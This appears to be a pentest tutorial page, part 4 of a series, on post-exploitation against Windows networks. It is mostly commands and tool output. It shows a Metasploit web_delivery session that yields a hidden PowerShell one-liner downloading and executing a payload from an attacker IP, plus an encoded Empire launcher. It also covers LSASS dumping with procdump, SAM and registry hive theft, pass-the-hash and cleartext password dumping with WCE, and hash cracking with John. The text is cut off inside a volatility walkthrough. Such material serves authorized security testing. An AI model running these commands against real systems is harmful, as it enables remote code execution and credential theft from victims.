LFF-IPS-P4-PostExploitation.html

<!doctype html>

<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">

      var _gaq = _gaq || [];
      _gaq.push(['_setAccount', 'UA-92365403-1']);
      _gaq.push(['_trackPageview']);

      (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
      })();
    </script>
    <title>Infrastructure PenTest Series : Part 4 - Post Exploitation &#8212; tech.bitvijays.com</title>
    <link rel="stylesheet" href="_static/bizstyle.css" type="text/css" />
    <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
    <script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"></script>
    <script type="text/javascript" src="_static/jquery.js"></script>
    <script type="text/javascript" src="_static/underscore.js"></script>
    <script type="text/javascript" src="_static/doctools.js"></script>
    <script type="text/javascript" src="_static/disqus.js"></script>
    <script type="text/javascript" src="_static/bizstyle.js"></script>
    <link rel="search" title="Search" href="search.html" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <!--[if lt IE 9]>
    <script type="text/javascript" src="_static/css3-mediaqueries.js"></script>
    <![endif]-->
  </head><body>
    <div class="related" role="navigation" aria-label="related navigation">
      <h3>Navigation</h3>
      <ul>
        <li class="nav-item nav-item-0"><a href="index.html">tech.bitvijays.com</a> &#187;</li> 
      </ul>
    </div>
      <div class="sphinxsidebar" role="navigation" aria-label="main navigation">
        <div class="sphinxsidebarwrapper">
  <h3><a href="index.html">Table Of Contents</a></h3>
  <ul>
<li><a class="reference internal" href="#">Infrastructure PenTest Series : Part 4 - Post Exploitation</a><ul>
<li><a class="reference internal" href="#gather-windows-credentials">Gather Windows Credentials</a><ul>
<li><a class="reference internal" href="#metasploit-web-delivery">Metasploit Web Delivery</a></li>
<li><a class="reference internal" href="#powershell-empire">Powershell Empire</a></li>
<li><a class="reference internal" href="#dump-lsass-exe-local-security-authority-subsystem-service">Dump Lsass.exe (Local Security Authority Subsystem Service)</a><ul>
<li><a class="reference internal" href="#procdump">Procdump</a></li>
<li><a class="reference internal" href="#powershell-out-minidump">Powershell Out-MiniDump</a></li>
</ul>
</li>
<li><a class="reference internal" href="#registry-hives">Registry Hives</a></li>
<li><a class="reference internal" href="#windows-credential-editor-wce">Windows Credential Editor (WCE)</a><ul>
<li><a class="reference internal" href="#list-ntlm-credentials-in-memory">List NTLM credentials in memory</a></li>
<li><a class="reference internal" href="#create-a-new-logon-session">Create a new logon session</a></li>
<li><a class="reference internal" href="#write-hashes-obtained-by-wce-to-a-file">Write hashes obtained by WCE to a file?</a></li>
<li><a class="reference internal" href="#dump-logon-cleartext-passwords-with-wce">Dump logon cleartext passwords with WCE?</a></li>
<li><a class="reference internal" href="#useful-information">Useful Information</a></li>
</ul>
</li>
<li><a class="reference internal" href="#system-security-sam-file">System/ Security /SAM File</a><ul>
<li><a class="reference internal" href="#id3">creddump7</a></li>
</ul>
</li>
<li><a class="reference internal" href="#virtual-machine-snapshots-and-suspended-states-vmss2core">Virtual Machine Snapshots And Suspended States - Vmss2core</a></li>
<li><a class="reference internal" href="#active-directory-built-in-groups-self-elevation">Active Directory Built-In Groups Self-Elevation</a><ul>
<li><a class="reference internal" href="#built-in-administrators-to-ea-da">Built-In Administrators to EA/DA</a></li>
<li><a class="reference internal" href="#server-operators-elevate-to-ea-da-ba">Server Operators elevate to EA/DA/BA</a></li>
<li><a class="reference internal" href="#account-operators-elevate-to-privileged-group-via-nested-group">Account Operators elevate to privileged group via nested group</a></li>
<li><a class="reference internal" href="#member-of-backup-operators-elevate-to-administrators">Member of Backup Operators elevate to Administrators</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#high-impact-exploitation">High Impact Exploitation</a><ul>
<li><a class="reference internal" href="#outlook-data-file-pst">Outlook data file .pst</a></li>
<li><a class="reference internal" href="#pillage-exchange">Pillage Exchange</a><ul>
<li><a class="reference internal" href="#full-access-to-the-targeted-users-mailbox">Full access to the targeted user’s mailbox</a></li>
<li><a class="reference internal" href="#search-mailbox-cmdlet">Search-Mailbox cmdlet</a></li>
</ul>
</li>
<li><a class="reference internal" href="#file-servers">File Servers</a></li>
<li><a class="reference internal" href="#active-directory-database-credentials">Active Directory Database Credentials</a></li>
<li><a class="reference internal" href="#c-level-executive-webcam-microphone-user-activity-recording">C-Level Executive - Webcam, Microphone, User Activity Recording</a><ul>
<li><a class="reference internal" href="#webcam">Webcam</a></li>
<li><a class="reference internal" href="#record-mic">Record_Mic</a></li>
<li><a class="reference internal" href="#user-activity">User Activity</a></li>
</ul>
</li>
<li><a class="reference internal" href="#hypervisor">Hypervisor</a></li>
<li><a class="reference internal" href="#targeted-hunting">Targeted Hunting</a><ul>
<li><a class="reference internal" href="#microsofts-system-center-configuration-manager">Microsoft’s System Center Configuration Manager</a></li>
<li><a class="reference internal" href="#microsoft-system-center-operations-manager">Microsoft System Center Operations Manager</a></li>
<li><a class="reference internal" href="#puppet">Puppet</a></li>
<li><a class="reference internal" href="#credmap-the-credential-mapper">Credmap: The credential Mapper</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#appendix-i-windows-credentials">Appendix-I : Windows Credentials</a><ul>
<li><a class="reference internal" href="#terminology-authentication-credentials-and-authenticators">Terminology: authentication, credentials, and authenticators</a></li>
<li><a class="reference internal" href="#credentials-in-windows-operating-systems">Credentials in Windows operating systems</a><ul>
<li><a class="reference internal" href="#identities-usernames">Identities - usernames</a></li>
<li><a class="reference internal" href="#windows-authenticators">Windows authenticators</a></li>
<li><a class="reference internal" href="#credential-storage">Credential Storage</a></li>
<li><a class="reference internal" href="#windows-authentication-protocols">Windows authentication protocols</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#appendix-ii-cracking-hashes">Appendix-II Cracking Hashes</a><ul>
<li><a class="reference internal" href="#john-the-ripper">John The Ripper</a><ul>
<li><a class="reference internal" href="#lm-nt-nt-hashes">LM:NT/ NT-Hashes</a></li>
<li><a class="reference internal" href="#korelogic-rules">Korelogic Rules</a></li>
<li><a class="reference internal" href="#loopback">Loopback?</a></li>
<li><a class="reference internal" href="#password-statistics">Password Statistics</a></li>
</ul>
</li>
</ul>
</li>
<li><a class="reference internal" href="#appendix-iii-interesting-stories">Appendix-III Interesting Stories</a><ul>
<li><a class="reference internal" href="#tools">Tools</a></li>
</ul>
</li>
<li><a class="reference internal" href="#changelog">Changelog</a></li>
</ul>
</li>
</ul>

  <h3>This Page</h3>
  <ul class="this-page-menu">
    <li><a href="_sources/LFF-IPS-P4-PostExploitation.rst.txt"
           rel="nofollow">Show Source</a></li>
    <li><a href="https://github.com/bitvijays/bitvijays.github.io-sphinx/blob/master/docs/LFF-IPS-P4-PostExploitation.rst"
           rel="nofollow">Show on GitHub</a></li>
    <li><a href="https://github.com/bitvijays/bitvijays.github.io-sphinx/edit/master/docs/LFF-IPS-P4-PostExploitation.rst"
           rel="nofollow">Edit on GitHub</a></li>
  </ul>
<div id="searchbox" style="display: none" role="search">
  <h3>Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="search.html" method="get">
      <input type="text" name="q" />
      <input type="submit" value="Go" />
      <input type="hidden" name="check_keywords" value="yes" />
      <input type="hidden" name="area" value="default" />
    </form>
    </div>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
        </div>
      </div>

    <div class="document">
      <div class="documentwrapper">
        <div class="bodywrapper">
          <div class="body" role="main">
            
  <div class="section" id="infrastructure-pentest-series-part-4-post-exploitation">
<h1>Infrastructure PenTest Series : Part 4 - Post Exploitation<a class="headerlink" href="#infrastructure-pentest-series-part-4-post-exploitation" title="Permalink to this headline">¶</a></h1>
<p>From the previous post, we learned how to have authenticated remote shell in windows, in this post, we will have a look around of how to <a class="reference internal" href="#gather-windows-credentials"><span class="std std-ref">Gather Windows Credentials</span></a> after getting a remote shell. We would also have a look how to have a <a class="reference internal" href="#high-impact-post-exploitation"><span class="std std-ref">High Impact Exploitation</span></a> which leaves an impact to the higher management for the organization. In <a class="reference internal" href="#a1-windows-credentials"><span class="std std-ref">Appendix-I : Windows Credentials</span></a>, We have explained the concepts about authentication, credentials and authenticators, credential storage, authentication protocols, logon types. In <a class="reference internal" href="#a2-cracking-hashes"><span class="std std-ref">Appendix-II Cracking Hashes</span></a>, we talk about cracking windows active directory LM:NT hashes. In <a class="reference internal" href="#a3-interesting-stories"><span class="std std-ref">Appendix-III Interesting Stories</span></a> contains blog links which might be helpful doing post-exploitation.</p>
<div class="section" id="gather-windows-credentials">
<span id="id1"></span><h2>Gather Windows Credentials<a class="headerlink" href="#gather-windows-credentials" title="Permalink to this headline">¶</a></h2>
<p>Once we have administrative remote shell, our next task is to gather all the passwords from Security Accounts Manager (SAM) database, Local Security Authority Subsystem (LSASS) process memory. Domain Active Directory Database (domain controllers only), Credential Manager (CredMan) store or LSA Secrets in the registry and get all the passwords (clear-text or hashed). A lot of stuff has already been mentioned at <a class="reference external" href="http://netsec.ws/?p=314">Obtaining Windows Passwords</a> and <a class="reference external" href="https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/">Dumping Windows Credential</a> and Bernardo Blog Dump Windows password hashes efficiently <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes.html">Part1</a> , <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_16.html">Part2</a>, <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_20.html">Part3</a>, <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_21.html">Part4</a>, <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_28.html">Part5</a> and <a class="reference external" href="http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_29.html">Part6</a>.</p>
<p>We have tried to combine all the methods in one post. (A lot of stuff has also been not mentioned such fgdump, pwdump etc.). For all methods, check <a class="reference external" href="https://attack.mitre.org/wiki/Technique/T1003">Credential Dumping</a> on ATT&amp;CK.</p>
<p>So, back to credential dumping after getting a remote shell, there are multiple methods to do the following:</p>
<ul class="simple">
<li>Get metasploit meterpreter by using Web Delivery method and run mimikatz</li>
<li>Get powershell empire agent by using powershell launcher string and run mimikatz</li>
<li>Execute Windows Credential Editor (WCE)</li>
<li>Dumping Local Security Authority Subsystem Service</li>
<li>Dumping Registry Hives</li>
<li>Dumping System/ Security/ SAM File</li>
<li>Virtual Machine Snapshots and Suspended States - Vmss2core</li>
</ul>
<div class="section" id="metasploit-web-delivery">
<h3>Metasploit Web Delivery<a class="headerlink" href="#metasploit-web-delivery" title="Permalink to this headline">¶</a></h3>
<p><a class="reference external" href="https://www.offensive-security.com/metasploit-unleashed/web-delivery/">Metasploit Web Delivery</a> : Metasploit’s Web Delivery Script is a versatile module that creates a server on the attacking machine which hosts a payload. When the victim connects to the attacking server, the payload will be executed on the victim machine. This module has a powershell method which generates a string which is needed to be executed on remote windows machine.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>msf &gt; use exploit/multi/script/web_delivery
msf exploit(web_delivery) &gt; show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH


msf exploit(web_delivery) &gt; set target 2
target =&gt; 2
msf exploit(web_delivery) &gt; set payload windows/x64/meterpreter/reverse_https
payload =&gt; windows/x64/meterpreter/reverse_https
msf exploit(web_delivery) &gt; set lhost 14.97.131.138
lhost =&gt; 14.97.131.138
msf exploit(web_delivery) &gt; run
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://14.97.131.138:8443
msf exploit(web_delivery) &gt; [*] Using URL: http://0.0.0.0:8080/uMOKs6wtlYL
[*] Local IP: http://14.97.131.138:8080/uMOKs6wtlYL
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $X=new-object net.webclient;$X.proxy=[Net.WebRequest]::GetSystemWebProxy();$X.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $X.downloadstring(&#39;http://14.97.131.138:8080/uMOKs6wtlYL&#39;);
</pre></div>
</div>
<p>When the following command (when there is no proxy)</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>powershell.exe -nop -w hidden -c $X=new-object net.webclient;IEX $X.downloadstring(&#39;http://14.97.131.138:8080/uMOKs6wtlYL&#39;);
</pre></div>
</div>
<p>or (when there is proxy)</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>powershell.exe -nop -w hidden -c $X=new-object net.webclient;$X.proxy=[Net.WebRequest]::GetSystemWebProxy();$X.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $X.downloadstring(&#39;http://14.97.131.138:8080/uMOKs6wtlYL&#39;);
</pre></div>
</div>
<p>is executed on the windows remote machine, we should get a meterpreter.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Delivery web_delivery payload
meterprerter&gt;
</pre></div>
</div>
<p>Once we have got the meterpreter, we can use mimikatz or kiwi to dump all the credentials.</p>
</div>
<div class="section" id="powershell-empire">
<h3>Powershell Empire<a class="headerlink" href="#powershell-empire" title="Permalink to this headline">¶</a></h3>
<p><a class="reference external" href="https://www.powershellempire.com/">Powershell Empire agent</a> : Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.</p>
<p>After creating a listener, we just need to create a launcher using stager:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>(Empire: listeners) &gt; usestager launcher
(Empire: stager/launcher) &gt; set Listener test
(Empire: stager/launcher) &gt; generate
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAUwB0AGUAbQAuAE4ARQBUAMAA7ACQAdwBDAD0ATgBFAFcALQBPAGIASgBlAGMAVAAgAFMAeQBTAFQAZQBNAC4ATgBlAHQALgBXAEUAQgBDAGwASQBFAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAG*snip*4AOQA3AC4AMQAzADEALgAxADMAOAA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABPAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwAZQBOAEcAdABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBKAG8ASQBOACcAJwApAA==
</pre></div>
</div>
<p>When the above command is executed on the windows remote shell, we should be able to get a powershell agent</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>(Empire) &gt; [+] Initial agent 2FTFYMKDFSSFS from 192.168.42.5 now active
</pre></div>
</div>
<p>Sometimes the above two will fail to work, in which case, we revert to the old techniques:</p>
</div>
<div class="section" id="dump-lsass-exe-local-security-authority-subsystem-service">
<h3>Dump Lsass.exe (Local Security Authority Subsystem Service)<a class="headerlink" href="#dump-lsass-exe-local-security-authority-subsystem-service" title="Permalink to this headline">¶</a></h3>
<div class="section" id="procdump">
<h4>Procdump<a class="headerlink" href="#procdump" title="Permalink to this headline">¶</a></h4>
<p>This method has been mentioned <a class="reference external" href="https://cyberarms.wordpress.com/2015/03/16/grabbing-passwords-from-memory-using-procdump-and-mimikatz/">Grabbing Passwords from Memory using Procdump and Mimikatz</a> , <a class="reference external" href="https://adsecurity.org/?p=462">How Attackers Extract Credentials (Hashes) From LSASS</a> , <a class="reference external" href="http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html">Mimikatz Minidump and mimikatz via bat file</a> , <a class="reference external" href="http://c0d3xpl0it.blogspot.in/2016/04/extracting-clear-text-passwords-using-procdump-and-mimikatz.html">Extracting Clear Text Passwords Using Procdump and Mimikatz</a> and <a class="reference external" href="http://www.fuzzysecurity.com/tutorials/18.html">I’ll Get Your Credentials … Later!</a></p>
<ul class="simple">
<li>First, upload the <a class="reference external" href="https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">ProcDump.exe</a> to the remote computer by using smb, windows explorer.</li>
<li>Second, from the remote shell, execute</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Windows\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp     =&gt; For 32 bit system
C:\Windows\temp\procdump.exe -accepteula -ma -64 lsass.exe lsass.dmp =&gt; For 64 bit system
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Download the lsass.dmp and use mimikatz to get the passwords.</li>
</ul>
</div>
<div class="section" id="powershell-out-minidump">
<h4>Powershell Out-MiniDump<a class="headerlink" href="#powershell-out-minidump" title="Permalink to this headline">¶</a></h4>
<p>This method is similar to the procdump using powershell. Instead of procdump, we utilize powershell <a class="reference external" href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1">Out-MiniDump.ps1</a> from PowerSploit</p>
<ul class="simple">
<li>Launch PowerShell and <a class="reference external" href="http://ss64.com/ps/source.html">dot source</a> function from the Out-Minidump.ps1</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>. c:\path\to\Out-Minidump.ps1
</pre></div>
</div>
</div></blockquote>
<ul class="simple">
<li>Create dump of the process using this syntax:</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Get-Process lsass | Out-Minidump -DumpFilePath C:\Windows\Temp
</pre></div>
</div>
</div></blockquote>
</div>
</div>
<div class="section" id="registry-hives">
<h3>Registry Hives<a class="headerlink" href="#registry-hives" title="Permalink to this headline">¶</a></h3>
<p>Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\&gt; reg.exe save hklm\sam c:\temp\sam.save
C:\&gt; reg.exe save hklm\security c:\temp\security.save
C:\&gt; reg.exe save hklm\system c:\temp\system.save
</pre></div>
</div>
<p>Get the password hashes of the local accounts, the cached domain credentials and the LSA secrets in a single run with Impacket secretsdump.py</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies

[*] Target system bootKey: 0x602e8c2947d56a95bf9cfxxxxxxxxxxx
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
admsys  :500 :aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d68xxxxxxxxxx:::
Guest   :501 :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59dxxxxxxxxx:::
support :1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b5xxxxxxxxx:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
adm2:6ec74661650377df488415415bf10321:system1.example.com:EXAMPLE:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:system2.example.COM:EXAMPLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9adxxxxxxxxxx
</pre></div>
</div>
</div>
<div class="section" id="windows-credential-editor-wce">
<h3>Windows Credential Editor (WCE)<a class="headerlink" href="#windows-credential-editor-wce" title="Permalink to this headline">¶</a></h3>
<p>Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).</p>
<p>The tool allows users to:</p>
<ul class="simple">
<li>Perform Pass-the-Hash on Windows</li>
<li>‘Steal’ NTLM credentials from memory (with and without code injection)</li>
<li>‘Steal’ Kerberos Tickets from Windows machines</li>
<li>Use the ‘stolen’ kerberos Tickets on other Windows or Unix machines to gain access to systems and services</li>
<li>Dump cleartext passwords stored by Windows authentication packages</li>
</ul>
<p><strong>Examples</strong></p>
<div class="section" id="list-ntlm-credentials-in-memory">
<h4>List NTLM credentials in memory<a class="headerlink" href="#list-ntlm-credentials-in-memory" title="Permalink to this headline">¶</a></h4>
<p>By default, WCE lists NTLM credentials in memory, no need to specify any options.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Users\test&gt;wce.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

theuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
</pre></div>
</div>
</div>
<div class="section" id="create-a-new-logon-session">
<h4>Create a new logon session<a class="headerlink" href="#create-a-new-logon-session" title="Permalink to this headline">¶</a></h4>
<p>Create a new logon session and launch a program with new NTLM credentials?</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>wce.exe -s &lt;username&gt;:&lt;domain&gt;:&lt;lmhash&gt;:&lt;nthash&gt; -c &lt;program&gt;
</pre></div>
</div>
<p>Example:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Users\test&gt;wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe

WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of new logon session (000118914h) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!
</pre></div>
</div>
<p>At this point, a new cmd.exe instance will be launched and network connections using NTLM initiated from that instance will use the NTLM credentials specified.</p>
</div>
<div class="section" id="write-hashes-obtained-by-wce-to-a-file">
<h4>Write hashes obtained by WCE to a file?<a class="headerlink" href="#write-hashes-obtained-by-wce-to-a-file" title="Permalink to this headline">¶</a></h4>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\&gt;wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

C:\&gt;type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
</pre></div>
</div>
</div>
<div class="section" id="dump-logon-cleartext-passwords-with-wce">
<h4>Dump logon cleartext passwords with WCE?<a class="headerlink" href="#dump-logon-cleartext-passwords-with-wce" title="Permalink to this headline">¶</a></h4>
<p>The -w switch can be used to dump logon passwords stored in cleartext by the Windows Digest Authentication package. For example:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\&gt;wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity com)
Use -h for help.

test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test
</pre></div>
</div>
<p><a class="reference external" href="http://www.youtube.com/watch?v=tJ0VJVrhwTE&amp;ap=%2526fmt%3d22">This</a> video shows the use of the -w switch in a Windows 2008 Server</p>
</div>
<div class="section" id="useful-information">
<h4>Useful Information<a class="headerlink" href="#useful-information" title="Permalink to this headline">¶</a></h4>
<ul class="simple">
<li>Cachedump obtains NTLM credentials from the Windows Credentials Cache (aka logon cache, logon information cache, etc). This cache can be disabled and it is very often disabled by network/domain/windows administrators (<a class="reference external" href="http://support.microsoft.com/kb/172931">see here</a> ). WCE will be able to steal credentials even when this cache is disabled.</li>
<li>WCE obtains NTLM credentials from memory, which are used by the system to perform SSO; it uses a series of techniques the author of WCE developed.</li>
<li>Pwdump dumps NTLM credentials from the local SAM. Let’s say, a administrator remote desktop to a server (compromised by attacker and can run wce). In this case, WCE would be able get the credential of Administrator ( who RDP’d ), However, pwdump will only allow you to obtain the NTLM credentials of the local SAM</li>
</ul>
<p>The above information has been taken from <a class="reference external" href="http://www.ampliasecurity.com/research/wcefaq.html">WCE FAQ</a></p>
</div>
</div>
<div class="section" id="system-security-sam-file">
<h3>System/ Security /SAM File<a class="headerlink" href="#system-security-sam-file" title="Permalink to this headline">¶</a></h3>
<p>During penetration assessment, we do find VMDK file (Virtual Machine Disk), we should be able to mound vmdk file either by using Windows Explorer, VMWare Workstation or OSFMount. After mounting, we should be able to copy</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>System32/config/SYSTEM
System32/config/SECURITY
</pre></div>
</div>
<p>Passwords from these file could be extracted by using <a class="reference external" href="https://github.com/Neohapsis/creddump7">creddump7</a></p>
<div class="section" id="id3">
<h4>creddump7<a class="headerlink" href="#id3" title="Permalink to this headline">¶</a></h4>
<p>Run cachedump.py on the SYSTEM and SECURITY hives to extract cached domain creds:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># ./cachedump.py
usage: ./cachedump.py &lt;system hive&gt; &lt;security hive&gt; &lt;Vista/7&gt;

Example (Windows Vista/7):
./cachedump.py /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true

Example (Windows XP):
./cachedump.py /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false

# ./cachedump.py /mnt/win/Windows/System32/config/SYSTEM /mnt/win/Windows/System32/config/SECURITY true |tee hashes
nharpsis:6b29dfa157face3f3d8db489aec5cc12:acme:acme.local
god:25bd785b8ff1b7fa3a9b9e069a5e7de7:acme:acme.local
</pre></div>
</div>
<p>If you want to crack the hashes and have a good wordlist, John can be used. The hashes are in the ‘mscash2’ format:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt hashes
Loaded 2 password hashes with 2 different salts (M$ Cache Hash 2 (DCC2) PBKDF2-HMAC-SHA-1 [128/128 SSE2 intrinsics 8x])
g0d              (god)
Welcome1!        (nharpsis)
</pre></div>
</div>
<p>The examples above are taken from creddump7 Readme</p>
</div>
</div>
<div class="section" id="virtual-machine-snapshots-and-suspended-states-vmss2core">
<h3>Virtual Machine Snapshots And Suspended States - Vmss2core<a class="headerlink" href="#virtual-machine-snapshots-and-suspended-states-vmss2core" title="Permalink to this headline">¶</a></h3>
<p>This method has been directly taken from the Fuzzy Security Blog <a class="reference external" href="http://www.fuzzysecurity.com/tutorials/18.html">I’ll Get Your Credentials … Later!</a></p>
<p>After compromising a target if we discover that the box hosts Virtual Machines. We can utilize <a class="reference external" href="https://labs.vmware.com/flings/vmss2core">vmss2core</a> , we can use this tool to create a coredump of a Virtual Machine, If that machine has suspended (<em>.vmss) or snapshot (</em>.vmsn) checkpoint state files. These files can be parsed by the volatility framework to extract a hashdump.</p>
<p>Make sure to use the appropriate version of vmss2core, in this case I needed the 64-bit OSX version.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># We are working with a suspended state so we need to combine *.vmss and *.vmem. If we were
 dealing with a snapshot we would need to combine *.vmsn and *.vmem.

Avalon:Tools b33f$ ./vmss2core_mac64 -W
/Users/b33f/Documents/VMware/VMs/Win7-Testbed/Windows\ 7.vmwarevm/Windows\ 7-e7a44fca.vmss
/Users/b33f/Documents/VMware/VMs/Win7-Testbed/Windows\ 7.vmwarevm/Windows\ 7-e7a44fca.vmem

vmss2core version 3157536 Copyright (C) 1998-2013 VMware, Inc. All rights reserved.
Win32: found DDB at PA 0x2930c28
Win32: MmPfnDatabase=0x82970700
Win32: PsLoadedModuleList=0x82950850
Win32: PsActiveProcessHead=0x82948f18
Win32: KiBugcheckData=0x82968a40
Win32: KernBase=0x82806000

Win32: NtBuildLab=0x82850fa8
Win: ntBuildLab=7601.17514.x86fre.win7sp1_rtm.101119-1850  # Win7 SP1 x86
CoreDumpScanWin32: MinorVersion set to 7601
... 10 MBs written.
... 20 MBs written.
... 30 MBs written.
... 40 MBs written.
... 50 MBs written.

[...Snip...]

Finished writing core.
</pre></div>
</div>
<p>After transferring the coredump back out we can let volatility do it’s magic. We need to determine which OS the dump comes from for volatility to parse it correctly.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># We can see that volatility is unable to accurately determine the OS profile, however from the vmss2core
  output above we can see that the correct profile is &quot;Win7SP1x86&quot;.

root@Josjikawa:~/Tools/volatility# ./vol.py imageinfo -f ../../Desktop/memory.dmp

Determining profile based on KDBG search...

          Suggested Profile(s) : Win7SP0x86, Win7SP1x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : WindowsCrashDumpSpace32 (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/root/Desktop/memory.dmp)
                      PAE type : PAE
                           DTB : 0x185000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2014-09-13 19:15:04 UTC+0000
     Image local date and time : 2014-09-13 21:15:04 +0200
</pre></div>
</div>
<p>Using the “hivelist” plugin we can now get the memory offsets for the various registry hives.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>root@Josjikawa:~/Tools/volatility# ./vol.py hivelist -f ../../Desktop/memory.dmp --profile=Win7SP1x86

Volatility Foundation Volatility Framework 2.4

Virtual    Physical   Name
---------- ---------- ----
0x988349c8 0x3945a9c8 \??\C:\Users\Fubar\AppData\Local\Microsoft\Windows\UsrClass.dat
0x87a0c008 0x27f9f008 [no name]
0x87a1c008 0x280ed008 \REGISTRY\MACHINE\SYSTEM                # SYSTEM
0x87a3a6b0 0x27d4b6b0 \REGISTRY\MACHINE\HARDWARE
